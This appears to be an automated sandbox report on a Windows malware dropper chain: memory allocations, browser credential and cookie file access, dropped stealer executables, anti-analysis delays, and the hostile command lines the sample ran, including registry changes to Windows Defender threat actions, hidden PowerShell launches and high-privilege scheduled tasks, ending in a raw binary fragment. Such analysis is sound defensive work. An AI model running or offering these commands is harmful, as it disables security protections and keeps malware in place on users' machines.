NtAllocateVirtualMemory June 15, 2024, 8:20 a.m.	process_identifier: 2828 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x021f0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 15, 2024, 8:20 a.m.	process_identifier: 2828 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02200000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 15, 2024, 8:20 a.m.	process_identifier: 2828 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02250000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 15, 2024, 8:20 a.m.	process_identifier: 2828 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02260000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 15, 2024, 8:20 a.m.	process_identifier: 2828 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02570000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 15, 2024, 8:20 a.m.	process_identifier: 2828 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026c0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 15, 2024, 8:20 a.m.	process_identifier: 2828 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026d0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 15, 2024, 8:20 a.m.	process_identifier: 2828 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02720000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 15, 2024, 8:20 a.m.	process_identifier: 2828 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02770000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 15, 2024, 8:20 a.m.	process_identifier: 2828 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027c0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 15, 2024, 8:20 a.m.	process_identifier: 2828 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027d0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 15, 2024, 8:20 a.m.	process_identifier: 2828 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027e0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 15, 2024, 8:20 a.m.	process_identifier: 2828 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02830000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Checks whether any human activity is being performed by constantly checking whether the foreground window changed

A process attempted to delay the analysis task. (3 events)

description	axplong.exe tried to sleep 1067 seconds, actually delayed analysis time by 1067 seconds
description	a2772ea559.exe tried to sleep 320 seconds, actually delayed analysis time by 320 seconds
description	explortu.exe tried to sleep 1136 seconds, actually delayed analysis time by 1136 seconds

An application raised an exception which may be indicative of an exploit crash (2 events)

Time & API	Arguments	Status	Return	Repeated
Application Crash	Process chrome.exe with pid 2808 crashed
__exception__ June 15, 2024, 8:14 a.m.	stacktrace: 0x5a2e04 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 exception.instruction_r: ff 15 16 1f 09 00 ff 25 00 00 00 00 aa a4 c1 76 exception.instruction: call qword ptr [rip + 0x91f16] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x5a2e04 registers.r14: 184020784 registers.r15: 184021224 registers.rcx: 200 registers.rsi: 17302540 registers.r10: 0 registers.rbx: 58142400 registers.rsp: 184019960 registers.r11: 184024480 registers.r8: 1994752396 registers.r9: 0 registers.rdx: 1508 registers.r12: 33338656 registers.rbp: 184020096 registers.rdi: 33075904 registers.rax: 5910016 registers.r13: 184020656	1	0	0

Steals private information from local Internet browsers (41 events)

file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Web Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\lockfile
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\CrashpadMetrics-spare.pma
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Login Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing Bloom Prefix Set
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing IP Blacklist
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\CrashpadMetrics.pma
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing Module Whitelist
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing\ChromeFilenameClientIncident.store
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing Side-Effect Free Whitelist
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing UwS List Prefix Set
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing Inclusion Whitelist
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing Csd Whitelist
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\CrashpadMetrics-active.pma
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local State
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics\BrowserMetrics-666D1B6A-AF8.pma
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics-active.pma
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing Extension Blacklist
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics-spare.pma
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing Resource Blacklist
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\First Run
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad\reports
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing Download Whitelist
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing Download
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\data_0
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing\AnyIpMalware.store
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing UwS List
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing Bloom
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad\metadata
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\index
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\data_1
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\data_2
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\data_3

Looks up the external IP address (1 event)

domain

ipinfo.io

Creates executable files on the filesystem (28 events)

file	C:\Users\test22\AppData\Local\Temp\onefile_776_133629000743281250\stub.exe
file	C:\Users\test22\AppData\Local\Temp\onefile_776_133629000743281250\libcrypto-1_1.dll
file	C:\Users\test22\AppData\Local\Temp\onefile_776_133629000743281250\libssl-1_1.dll
file	C:\Users\test22\AppData\Local\Temp\1000304001\b2c2c1.exe
file	C:\Users\test22\AppData\Local\Temp\1000035001\gold.exe
file	C:\Users\test22\AppData\Local\Temp\1000064001\NewKindR.exe
file	C:\Users\test22\AppData\Local\Temp\onefile_776_133629000743281250\libffi-7.dll
file	C:\Users\test22\AppData\Local\Temp\1000025001\setup222.exe
file	C:\Users\test22\AppData\Local\Temp\SetupWizard.exe
file	C:\Users\test22\AppData\Local\Temp\1000307001\setup.exe
file	C:\Users\test22\AppData\Local\Temp\onefile_776_133629000743281250\python310.dll
file	C:\Users\test22\1000015002\d7e4153d35.exe
file	C:\Users\test22\AppData\Local\Temp\onefile_776_133629000743281250\python3.dll
file	C:\Users\test22\AppData\Local\Temp\1000306001\FirstZ.exe
file	C:\Users\test22\AppData\Local\Temp\7zSB243.tmp\Install.exe
file	C:\Users\test22\AppData\Local\Temp\7zSB4F3.tmp\Install.exe
file	C:\Users\test22\AppData\Local\Temp\12.exe
file	C:\Users\test22\AppData\Local\Temp\1000008001\upd.exe
file	C:\Users\test22\AppData\Local\Temp\1000047001\lummac2.exe
file	C:\Users\test22\AppData\Local\Temp\1000005001\judit.exe
file	C:\Users\test22\AppData\Local\Temp\1000017001\db324166b9.exe
file	C:\Users\test22\AppData\Local\Temp\onefile_776_133629000743281250\vcruntime140.dll
file	C:\Users\test22\AppData\Local\Temp\1000016001\a2772ea559.exe
file	C:\Users\test22\AppData\Local\Temp\1000063001\drivermanager.exe
file	C:\Users\test22\AppData\Local\Temp\1000007001\redline123123.exe
file	C:\Users\test22\AppData\Local\Temp\1000060001\onecommander.exe
file	C:\Users\test22\AppData\Local\Temp\onefile_776_133629000743281250\sqlite3.dll
file	C:\Users\test22\AppData\Local\Temp\1000068001\servoces64.exe

Creates a shortcut to an executable file (1 event)

file	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (10 events)

cmdline	powershell start-process -WindowStyle Hidden gpupdate.exe /force
cmdline	"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
cmdline	SCHTASKS /Create /SC MINUTE /MO 1 /TN NewKindR.exe /TR "C:\Users\test22\AppData\Local\Temp\1000064001\NewKindR.exe" /F
cmdline	forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
cmdline	schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
cmdline	cmd /C forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
cmdline	schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST
cmdline	forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
cmdline	"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN NewKindR.exe /TR "C:\Users\test22\AppData\Local\Temp\1000064001\NewKindR.exe" /F
cmdline	/C powershell start-process -WindowStyle Hidden gpupdate.exe /force

Drops a binary and executes it (18 events)

file	C:\Users\test22\AppData\Local\Temp\9217037dc9\explortu.exe
file	C:\Users\test22\AppData\Local\Temp\1000016001\a2772ea559.exe
file	C:\Users\test22\AppData\Local\Temp\1000017001\db324166b9.exe
file	C:\Users\test22\AppData\Local\Temp\8254624243\axplong.exe
file	C:\Users\test22\AppData\Local\Temp\1000005001\judit.exe
file	C:\Users\test22\AppData\Local\Temp\1000007001\redline123123.exe
file	C:\Users\test22\AppData\Local\Temp\1000008001\upd.exe
file	C:\Users\test22\AppData\Local\Temp\1000025001\setup222.exe
file	C:\Users\test22\AppData\Local\Temp\1000035001\gold.exe
file	C:\Users\test22\AppData\Local\Temp\1000047001\lummac2.exe
file	C:\Users\test22\AppData\Local\Temp\1000060001\onecommander.exe
file	C:\Users\test22\AppData\Local\Temp\1000064001\NewKindR.exe
file	C:\Users\test22\AppData\Local\Temp\1000068001\servoces64.exe
file	C:\Users\test22\AppData\Local\Temp\onefile_776_133629000743281250\stub.exe
file	C:\Users\test22\AppData\Local\Temp\12.exe
file	C:\Users\test22\AppData\Local\Temp\1000304001\b2c2c1.exe
file	C:\Users\test22\AppData\Local\Temp\1000306001\FirstZ.exe
file	C:\Users\test22\AppData\Local\Temp\1000307001\setup.exe

Drops an executable to the user AppData folder (12 events)

file	C:\Users\test22\AppData\Local\Temp\1000008001\upd.exe
file	C:\Users\test22\AppData\Local\Temp\1000064001\NewKindR.exe
file	C:\Users\test22\AppData\Local\Temp\9217037dc9\explortu.exe
file	C:\Users\test22\AppData\Local\Temp\1000016001\a2772ea559.exe
file	C:\Users\test22\AppData\Local\Temp\1000307001\setup.exe
file	C:\Users\test22\AppData\Local\Temp\1000035001\gold.exe
file	C:\Users\test22\AppData\Local\Temp\12.exe
file	C:\Users\test22\AppData\Local\Temp\1000007001\redline123123.exe
file	C:\Users\test22\AppData\Local\Temp\8254624243\axplong.exe
file	C:\Users\test22\AppData\Local\Temp\1000047001\lummac2.exe
file	C:\Users\test22\AppData\Local\Temp\1000304001\b2c2c1.exe
file	C:\Users\test22\AppData\Local\Temp\1000017001\db324166b9.exe

WaitFor has been invoked (possibly to delay malicious activity)

Executes one or more WMI queries (1 event)

wmi	<INVALID POINTER>

A process created a hidden window (27 events)

Time & API	Arguments	Status	Return
ShellExecuteExW June 15, 2024, 8:20 a.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\9217037dc9\explortu.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\9217037dc9\explortu.exe	1	1
ShellExecuteExW June 15, 2024, 8:21 a.m.	show_type: 0 filepath_r: C:\Users\test22\1000015002\d7e4153d35.exe parameters: filepath: C:\Users\test22\1000015002\d7e4153d35.exe	1	1
ShellExecuteExW June 15, 2024, 8:21 a.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\1000016001\a2772ea559.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\1000016001\a2772ea559.exe	1	1
ShellExecuteExW June 15, 2024, 8:21 a.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\1000017001\db324166b9.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\1000017001\db324166b9.exe	1	1
ShellExecuteExW June 15, 2024, 8:21 a.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\8254624243\axplong.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\8254624243\axplong.exe	1	1
ShellExecuteExW June 15, 2024, 8:21 a.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\1000005001\judit.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\1000005001\judit.exe	1	1
ShellExecuteExW June 15, 2024, 8:21 a.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\1000007001\redline123123.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\1000007001\redline123123.exe	1	1
ShellExecuteExW June 15, 2024, 8:21 a.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\1000008001\upd.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\1000008001\upd.exe	1	1
ShellExecuteExW June 15, 2024, 8:21 a.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\1000025001\setup222.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\1000025001\setup222.exe	1	1
ShellExecuteExW June 15, 2024, 8:21 a.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\1000035001\gold.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\1000035001\gold.exe	1	1
ShellExecuteExW June 15, 2024, 8:21 a.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\1000047001\lummac2.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\1000047001\lummac2.exe	1	1
ShellExecuteExW June 15, 2024, 8:21 a.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\1000060001\onecommander.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\1000060001\onecommander.exe	1	1
ShellExecuteExW June 15, 2024, 8:21 a.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\1000063001\drivermanager.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\1000063001\drivermanager.exe	1	1
ShellExecuteExW June 15, 2024, 8:21 a.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\1000064001\NewKindR.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\1000064001\NewKindR.exe	1	1
ShellExecuteExW June 15, 2024, 8:21 a.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\1000068001\servoces64.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\1000068001\servoces64.exe	1	1
CreateProcessInternalW June 15, 2024, 8:21 a.m.	thread_identifier: 2708 thread_handle: 0x0000015c process_identifier: 2704 current_directory: filepath: track: 1 command_line: schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 0 process_handle: 0x00000160	1	1
CreateProcessInternalW June 15, 2024, 8:21 a.m.	thread_identifier: 2072 thread_handle: 0x00000168 process_identifier: 1152 current_directory: filepath: track: 1 command_line: schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 0 process_handle: 0x00000164	1	1
ShellExecuteExW June 15, 2024, 8:21 a.m.	show_type: 0 filepath_r: SCHTASKS parameters: /Create /SC MINUTE /MO 1 /TN NewKindR.exe /TR "C:\Users\test22\AppData\Local\Temp\1000064001\NewKindR.exe" /F filepath: SCHTASKS	1	1
ShellExecuteExW June 15, 2024, 8:21 a.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\1000304001\b2c2c1.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\1000304001\b2c2c1.exe	1	1
ShellExecuteExW June 15, 2024, 8:21 a.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\1000306001\FirstZ.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\1000306001\FirstZ.exe	1	1
ShellExecuteExW June 15, 2024, 8:21 a.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\1000307001\setup.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\1000307001\setup.exe	1	1
CreateProcessInternalW June 15, 2024, 8:21 a.m.	thread_identifier: 4024 thread_handle: 0x00000360 process_identifier: 4020 current_directory: C:\Users\test22\AppData\Local\Temp\7zSB4F3.tmp filepath: C:\Windows\System32\cmd.exe track: 1 command_line: "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force" filepath_r: C:\Windows\System32\cmd.exe stack_pivoted: 0 creation_flags: 67634196 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_SUSPENDED\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000368	1	1
ShellExecuteExW June 15, 2024, 8:21 a.m.	show_type: 0 filepath_r: cmd parameters: /C forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force" filepath: cmd	1	1
CreateProcessInternalW June 15, 2024, 8:21 a.m.	thread_identifier: 3660 thread_handle: 0x00000128 process_identifier: 3696 current_directory: C:\Users\test22\AppData\Local\Temp\7zSB4F3.tmp filepath: C:\Windows\System32\forfiles.exe track: 1 command_line: forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force" filepath_r: C:\Windows\system32\forfiles.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x0000012c	1	1
CreateProcessInternalW June 15, 2024, 8:21 a.m.	thread_identifier: 2144 thread_handle: 0x0000011c process_identifier: 2148 current_directory: filepath: C:\Windows\SysWOW64\cmd.exe track: 1 command_line: /C powershell start-process -WindowStyle Hidden gpupdate.exe /force filepath_r: C:\Windows\SysWOW64\cmd.exe stack_pivoted: 0 creation_flags: 0 () inherit_handles: 0 process_handle: 0x00000120	1	1
CreateProcessInternalW June 15, 2024, 8:21 a.m.	thread_identifier: 3888 thread_handle: 0x00000128 process_identifier: 3880 current_directory: c:\windows\system32 filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe track: 1 command_line: powershell start-process -WindowStyle Hidden gpupdate.exe /force filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x0000012c	1	1
ShellExecuteExW June 15, 2024, 8:21 a.m.	show_type: 0 filepath_r: C:\Windows\system32\gpupdate.exe parameters: /force filepath: C:\Windows\System32\gpupdate.exe	1	1

Changes read-write memory protection to read-execute (probably to avoid detection when setting all RWX flags at the same time) (1 event)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory June 15, 2024, 8:21 a.m.	process_identifier: 3912 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 1425408 protection: 32 (PAGE_EXECUTE_READ) base_address: 0x10001000 process_handle: 0xffffffff	1	0	0

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses June 15, 2024, 8:22 a.m.	flags: 15 family: 0		111	0

An executable file was downloaded by the processes explortu.exe, axplong.exe, newkindr.exe (17 events)

Time & API	Arguments	Status	Return
InternetReadFile June 15, 2024, 8:20 a.m.	buffer: MZÿÿ¸@ º´ Í!¸LÍ!This program cannot be run in DOS mode. $jä.øs·.øs·.øs·ep¶%øs·ev¶îøs·et¶/øs·ìy·øs·ìyw¶=øs·ìyp¶4øs·ìyv¶uøs·ew¶6øs·eu¶/øs·er¶5øs·.ør·ùs·Ýzz¶2øs·Ýz·/øs·.øä·/øs·Ýzq¶/øs·Rich.øs·PELiLfà'¼\|°ÿRÐ@ S@8@IÔ`°(@I°8@IÀ< @àÐ@ @àPPB @à J @à À\ @à.rsrc`\ @àÐ/p` @à.dataThà @IÖ ` @à¦ü¸d½Î¯['&@²á ¾)/¸ñY4ñ5ÃKêÏé½£0¦>ÓûAìï^!ÉkEO¬qZ¥d8<ïÇÂ¶ú×Æý Ëa núu_etºáô!OÔÕ2K:Ü¬ÁA×ÀM~6KìkÔ¿~¿Ë#ñ]ô7phäqVÏ}°5´z°YÑ¬Vøaxº©ZEÙÚÊêVê¹üÀÛ«H"üÐíî<z"D©ÞRgíYI@áª/ Á°±hàÜ"mÐf¿]-k¿ô7uZ³2 ^}Î!=#º0¾ÏÖCÕßs mÄPÏ&mÃ'7bghø2Åó.5"tÊ©±6î ö@ÂQé/·Ï¼ªÐ1þþy²òéZÂj»<BÌ^ýþ_p2Ò¹RÒDrâa=RZã ©£J7»r¿ÇR[+ë¸Tæ}ï,Þbr%r87¯ü+¢¨Q"¸0µG7aµ9SY^áÊ >bVªu÷ä×¶eûLÅ¤]æºåMav¦XrÑlL»'KF/SýDñ²"ø_5µ>wÑvç9+¡6¯4jè¡}´AÚwÞÙÆ.®ú¯°ÝxTÖ{QD©Áµè&Eìðn÷Ì'f JÂ:S9B0q©"ËlÉð ÷rÒÍ-jOZ\|Ô?XfÉêíåÝC9NEN°óAJCt%>¢ÜÎÂÈ7B$¦`ã pÁ8ÇÚZª¬ØJðkÅ xd63Öÿ7·ê¼/,Ç:i¯"TÓÏ½¯ZdÆH02ÿÓÌ¤õé×æx}'ßVNVÈç´Êy¦m³DBÊÎÄ>ì¥&oeâÊÜ3\|Üæ`3uÀ>}ùvR3y©Í ÜGÃñÎ±2+æxSIª<0 e§$)[ÀCÿÄ¼·ì#t@D 